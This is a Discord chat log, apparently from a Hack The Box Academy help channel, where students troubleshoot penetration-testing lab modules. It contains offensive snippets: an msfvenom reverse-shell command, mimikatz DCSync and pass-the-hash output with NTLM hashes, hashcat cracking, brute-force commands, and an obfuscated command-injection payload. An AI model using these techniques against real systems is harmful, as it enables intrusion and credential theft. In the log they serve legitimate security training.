The options within the pwn box version say its -w n which when i specify a number it errors, the online version on pentest monkey website says its -t.
this is how i've tried
smtp-user-enum -M VRFY -D <Domain> -U namelist.txt -t 10 <target-host>
smtp-user-enum -w 10 -M VRFY -D <Domain> -U namelist.txt -t <target-host>
The first executes but doesnt change the query timeout value, and the 2nd doesnt execute at all
Is VRFY enabled in the first instance?
yeah it works manually when I connect over telnet
Specify -M vrfy, also I think it's a capital W for wait time, could be wrong though
Ouh marcie to the rescueee 🔥
but only if the -w 10 is specified after the -M VRFY option
it was upper case VRFY and lower case -w tbf, but putting the -w switch after the -M switch and it worked.
but thank you all anyway
is it 17k after removing the doubles or before? I have been at it for a little while and I am still not getting a hit
Removing the 17k after
the password Def exists ¯_(ツ)_/¯
I guess I'll just be more patient
With hydra I specified 48 threads
great, my hydra version does not seem to support smb2 and my netexec version does not seem to multi thread very much
I can't bear it any longer. The lab for this module (https://academy.hackthebox.com/module/112/section/1079) is performing very poor. Response time is very late and the RDP session keeps disconnecting and a click takes ton of time to actually respond. The NMAP scan was running for more than 1 hour with still 10% completion rate. It's been 3 days and I am not able to complete the lab even after knowing the solution because RDP session keeps on disconnecting because of network issue.
My internet is fine, do not suggest to check my internet.
Ftp should be open
Switch regions/to tcp download
i think
it seemed rather slow, but I can give that a try
It helps if you say what your issue is
ping me if you can help me
Can't help you if we don't know what your problem is 
i am making a machine, my first machine
stuck in privilege escalation
You mean pwning/rooting
making my own machine for 200 dollar
This channel isn't for the app.hackthebox.com content, it's for academy content
Read #welcome on how to access more of the server
ok where should i go
inshort you can tell me
Seems like hydra is faster with multi threads than netexec, I got it now thanks
In short, you know how to read :) idk what channel would be better if you're making content
Maybe #1024429874246590575 if other channels that are only accessible via linking your htb account to the discord aren't what you're looking for
Already did that.
¯_(ツ)_/¯
specifying the domain also gave me a load of false positives so took me far longer to get the result than it should have 😭
Yeah its tricky
Targets aren't spawning and the windows RDP was slow as hell also pivoting and tunneling is fubar seems like they have some issues to handle
Hello, can anyone help with the analysis machine?
Verify/link your account following #welcome and you can access #1198325761795428464 and ask there
Message support
Oh, I thought you were talking about the skill assessment
What did you use for your wordlist?
The warning of permission denied, makes me think they didn't specify the port to bruteforce on
Especially considering it's a public ip
thank you! you're right I had to specify the port as its not on 22, not had to use that flag before
HI, anyone knows why in https://academy.hackthebox.com/module/18/section/80 question 2 htb-stu+ isn't correct if it's the user of the process? tyy
htb-stu+ is not the full name but it is cut off because there’s not enough space to display the full name (that’s why the + is there)
oh
I want to ask
During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.
Introduction to Digital Forensics - Rapid Triage Examination & Analysis Tools
I have used powershell to export the csv but Idk how to find the renamed file
Hi Guys im Stuck on the AD Skill Assessment 1:
Find cleartext credentials for another domain user. Submit the username as your answer.
I manged to RDP into MS01 but now i am completly lost
the spawning issue is driving me crazy, anyone is till having issue to spawn any lab machine?
dump everything
Hello, having a problem with the "intro to assembly language module" on the "Debugging with GDB" section with the "Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" When I step through it, before I even get to step 16 I get:
gef➤ si
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
Any suggestions on what I am doing wrong?
I've tried re-downloading the gdb.zip file a couple times with no luck on getting further.
Dumped lsa, got the NTLM for tpetty hash. However when using hashcat i get no result. Any idea?
||sudo hashcat -m 1000 fd37b6fec5704cadabb319cebf9e3a3a /usr/share/wordlists/rockyou.txt||
find the clear text creds instead
where are you setting the break point?
_start
start+16 doesn't mean 16 steps from start, check the values in the stack/registers
please ask before dming
we can continue here, what do you have?
0x401010 <_start+16>: "H1\300"
read the question, what are they asking?
The hex in the rax at +16 that shows a 0x0
using the pwnbox, since it's browser based, I noticed I can't efficiently use certain hotkeys
for example trying to use tmux and commands to split it vertically ( ctrl + B + " ) doesnt work
is there a way around this?
use a vm
Doesn't like the number it shows
stop before the _start+16 instruction
Ok I'm sitting here:
→ 0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax
that's not where you should stop
stop before the _start+16 instruction, then look at the rax register. that's it
The next step puts me here and the one after seg fault
→ 0x401013 add BYTE PTR [rax], a
that's after
the arrow is at _start+16, means that's the next instruction
it's also given in the section
Note: the instruction shown with the -> symbol is where we are at, and it has not yet been processed.
One step and I am past it
```
gef➤ b _start
gef➤ r
0x400ffe add BYTE PTR [rax], al
→ 0x401000 <_start+0000> movabs rax, 0x21796d6564616341
0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax
gef➤ s
0x401000 <_start+0000> movabs rax, 0x21796d6564616341
0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010> xor rax, rax
→ 0x401013 add BYTE PTR [rax], al
0x401015 add BYTE PTR [rax], al
0x401017 add BYTE PTR [rax], al
```
Hey everyone, I keep running logrotten and the exploit triggers but nothing ever gets written to /etc/bash_completion.d has anyone had this problem in the LPE module?
where should you be looking to see the value inside the rax register?
Yes, had some trouble with that. Got stuck for a long time before I got through it. DM
gef➤ x/wx 0x401010 ?
send a screenshot of your terminal
You want the registers?
what's the question asking? do you want the registers?
great, now you can see what's in rax, just go to the right instruction
also, your gef plugin probably didn't install properly, it's showing the instructions in base 16, you see _start+10, which is actually _start+16 in base 10
gef➤ print $rax
$1 = 0x0
step to the right instruction, and you don't have to print the register out, you can see what's in them in the screenshot above
How to login to use bloodhound??
there should be a provided password
in the module/section
a s will take me here: 0x401013 as I showed above
¯_(ツ)_/¯
go to the right instruction, then look here
which type of session should I use xorg?
si not s
new error
If this was such a pain for me, I know serious hate is coming for the remainder of this module. 😒
Hey guys, quick question here. How can be part of a group on htb labs? I am almost done with bug bounty path and I want to start doing more labs. I would like to be part of a team of my country... Venezuela
I mean in other words i want friends lmao
read the sections and understand them. it's also important to know the difference between registers, stack and memory addresses
you request to join a team on the labs thing
oh okok, thanks
it's as simple as that, this channel isn't really related to labs; read #welcome to find out how to access more of the server
thank u admin 
i know lmao. It was a small joke.. ❤️
lies
Shoutout to @errant moss for helping troubleshoot logrotten. You were a super big help.
Hello people
In the module network enumeration with nmap - submodule bypass security measures.
In the first example of firewall and ids / ips evasion
I've used some commands but I can't get the OS version
I too need some assistance with the thinking behind the JAVASCRIPT DEOBFUSCATION question: Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?"
Stuck on Basic Bypasses of File Inclusion, it every technique I have tried is either "Illegal path specified! " or nothing in the box? suggestions?
I finally figured it out, about 10 seconds after asking. I have been trying to figure out what you mean with this suggestion as I kept seeing it. I dont know how or where I would be replacing eval with print.
literally the first thing the minified/packed code has is eval(packed code)
using an online compiler you can do it pretty easy
i personally used programiz but i think the module has a fair few different ones
don't dm without asking btw
Right right, thank you for the rule reminder.
Okay i performed a dcsync with the tpetty user and got the Admin hash. Anyone know how i get the flag from the desktop?
you have DA, literally anything works
My DC Sync only gave me the NTLM Hash for Administrator, not a shell. How do i get a Shell on DC ?
pass the hash
How do i specify the DC as target for pth? I tried this so far without success:
||mimikatz # sekurlsa::pth /user:Administrator /domain:inlanefreight.htb /ntlm:27dedb1dab4d8545c6e1c66fba077da0||
refer to the pass the hash sections in password attacks
Looked it up still no success, here my output:
||```
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 8:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500
Credentials:
Hash NTLM: **
ntlm- **
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9

mimikatz # sekurlsa::pth /user:Administrator /domain:inlanefreight.htb /ntlm:*++/run:cmd.exe
user : Administrator
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : **
| PID 332
| TID 4116
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS
```||
you should probably redact the hash from this btw
also it's easier to parse if you do ``` before and after the block
so it would be like
||```
output
```||
Hey yall, I'm having trouble finding the correct output of the following command: find /usr/share/ | grep root | grep mysql | tail -n 1
I've tried URL encoding, base64 encoding, substituting the spaces with %0a or %09. It seems that the DB is not recognizing any pipe commands, "|" or "<<<".
I've tried many commands but this is my current one > ip=127.0.0.1%0ab'as'hPDw8Cg$(ba'se'64%0a-dPDw8CgZmluZCAvdXNyL3NoYXJlLyAtbmFtZSAnKnJvb3QqJyAtbmFtZSAnKm15c3FsKicgfCB0YWlsIC1uIDEK)
https://academy.hackthebox.com/module/109/section/1039
done both 🙂
Nvm, I got it. Make sure there aren't any unwanted spaces at the beginning or end of you commands when encoding your payloads
Hey guys, i pivoted into a machine and also found creds to log into mssql and i have sysadmin role in mssql and i can see seImpersonatePrivilege is enabled and i can use xp_cmdshell, how can i get a rev shell from my own local computer?
i ssh into the first user then from that user i pivoted into the windows box
What are you working on?
I'm not quite sure but these seems like the creds for bloodhound and you are using them to try and rdp? I think you have the creds mixed up
Nice, i was just about to message you.
Going through the skills assessment of the same module now. Hopefully I can do it without any assistance fingers-crossed
Can you rdp with the hash?
Maybe win-rm or cme?
What module and section are you on?
AD Enumeration & Attacks - Skills Assessment Part II
Which question?
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
in the pivoting tunneling module I have gained a shell with dnscat2, however it won't accept any of my commands, it just gives me a prompt of exec (OFFICEMANAGER) 1>
I mean if you have admin for sql you can read files on its system
DId you get the "A**** "account
ik but when i type to see the directories for example xp_cmdshell dir C:\Users\Administrator\Desktop it shows permissions denied
ends with 20?
Yes
This isn't the right place to ask, #starting-point is. If you see "no access" read #welcome
Try evil with those creds with the correct ip address
kk
Did you get a list of ip addresses?
yeah man i already connected to the ms01 with A user
Then you got the flag?
but this is for the sql01
YOu should be done with that question.
three machines one the dc, the other one is ms01 and the last one is sql10
i have to get the flag from the sql10 machine
The question says get the flag for MS01?
^
question 7
My bad
lol you good
yeah i did
that user dont connect to anything in sql01 machine only rdp in ms01 machine
You get the web.config?
can someone give me a hint as to how to enter commands into the dnscat2 prompt once I've gained a shell?
Those are the creds for n****?
but being able to have the perms to access administrator via mssql is the question
i tried xp_cmdshell dir C:\Users\Administrator but it gives me permission error while im on the n** user
Discord formatting
Can that user impersonate anyone?
You try mssqlclient.py?
idk, i tried the impersonation module via msconsole but it said it cant since im already the highest priv user
With the correct ip?
yeah bro i connected to the correct ip address corosponding to sql01 machine
with mssqlclient.py
Sup? Anyone that Already did "INTRODUCTION TO DIGITAL FORENSICS" wanna share some ideas? I just ended the module assessment but I am pretty sure I did in a way not intended by the Module Creator
Typical, Had pretty good notes until this part.
It appears at one point i created a reverseshell with msfvenom
$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=8080 -f exe > rshell.exe
but then how can i upload that reverse shell to the windows box?
bc it cant reach my local ip
You see the listening host IP address?
yeah im assuming that would be where i pivoted from the first machine
but what i meant was like how can i upload the shell into the sql machine
pivot
idk i get a diff set of ip
You shouldn't? AFAIK the internal network should be static
Run this - $fping -asgq 172.16.7.0/23
give me a sec my machine died
When taking your notes. It would be a good idea to write down all these IP addressess and try to label them distinctively as you go.
But im still a rookie. but thats why i had to start doing to keep track.
It's just good practice anyway
Anyone interested can DM me.
yeah i wrote down all the ips but the linux one so im guessing that would be the linux
Drawing a network diagram helps you keep things down
I believe it would be. Something I wasn't doing for awhile.
Ok go into the linux machine, see if it has msfconsole already on it.
Alongside the network, a list of known credentials on the machine
If i remember, alot of these linux machines already had alot of tools
Oh yeah.
For ease of use if you didn't wanna bother setting a multi-network pivot
oh yeah it does
What do you think you need to do then?
i think i got it from here
Alright good luck!
THANK YOUUU
I'm having a hard time figuring out where the injection point is on for the skills assessment in Command Injections. Any hints?
Using burp?
Yea
I've tried the login, the tmp folder, copying to the tmp folder, using the search bar....
You want to mv or copy to the tmp folder i think.
Thanks for the tip
Got any more tips?
Is it in the GET request?
Won’t be able to help for another 12 hours. Afk for awhile. DM if you still need help around then, what you’ve tried with screenshots.
#good luck
Should be able to put the injection in the request and get the output where I screenshot for you
I see the output and believe I have the right spot for the commands, it'll just take some time
Footprinting MySQL I get this error. Anybody know why?
Also getting the same error during nmap
If I take and complete a tier 0 module while having a subscription that automatically unlocks up to tier 2 modules, do I get the 10 cubes from the tier 0 module?
yep
Thanks
This ffuf module is nice and slow love that
Why is my ping to HTB academy like 150 rn? My wifi speeds are just fine.
Causing like 80-90% of ffuf requests to fail completely.
Problems with the servers
Known issue
Been like that lately
@rapid sparrow could you kindly check my DMs ?
Ummm
I did complete the lab questions (with walk-through) but I still seem to understand what this whole module is trying to teach. (footprinting DNS is slightly better)
I know this command is trying to subbrute the 10k names using the resolver, but where do I source the resolver from? (specifically the lab session)
./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt
I saw some comments saying ns.inlanefreight.htb means name server but why ns1 but not ns or ns2??
send send plz 😦
Ns1 or ns2 or ns is based on information you gathered about nameservers.
Should post this in #858470491676737536 ?
In this case, the name server is the target IP.
Remember that inlanefreight.com and inlanefreight.htb are not the same thing
If you want to learn more about DNS, read the Cloudflare blog
https://www.cloudflare.com/learning/dns/what-is-dns/
Hello everyone!
I am in retired swagshop machine
Help me with this I can't escape from this error, I watched official video, followed official write up, I watched more than 4 video, but I can't fix this problem
I have username and password, I write username and password inside of exploit python code
this channel isn't for retired machines my dude
Oh sorry I understood
this channel is explicitly for academy modules
guys, what command do i use to install tmux in parrotOS home?
i used apt install tmux and it said it couldn't find the package
hi
what have you tried?
can i DM?
Alright, so: I am at the Pivoting, tunneling module: Hypothetically: When I have a skill assessment in some other module. Can I do the same pivoting ,port-forwarding and tunelling in the future?
It's a lot better for me to act from my terminal via proxychains, when I know all of that gets forwarded anyway. Can I apply that in the future modules or is that available only for this module?
It's just super convenient from what I see.
yes, that's what pivoting is for, you can use it whenever you want to get access to an internal network
using ligolo-ng is 1000x better than proxychains stuff
Can anyone help me?
if you actually articulate what your problem is
Shoot it if it's module related.
Ima check it out.
A noob scammer is trying to scam me, I'm acting like I'm a stupid person, what should I do next to find his details... Basically I'm new in this field
I have Kali Linux btw
What...?
Huh
just report the scammer to discord
He is texting me on WhatsApp
.........
then ignore them dude
he is ready to click any link
hacking someone; even if they're scammers -- is illegal
$ sudo heck scammer
🙂
ik you've probably seen people like ScammerPayback and such creating reverse connections to scammers
Yes
but they are operating in a grey purview of the law
they provide any evidence they find directly to the authorities
if you have 0 idea what you're doing you are gonna find yourself in hot water really quick
They literally worked with Indian SWAT to coordinate a raid
Isn't it law enforcement?
they aren't just doing this for the lulz and because these guys deserve it
In India it's legal to hack a scammer
Even what Trilogy media does is HEAVILY in the grey area
irrelevant tbh as this is unrelated to academy modules here
True.
I get you wanna get back at these idiots; but this isn't the place
Ok, don't chit chat about it here.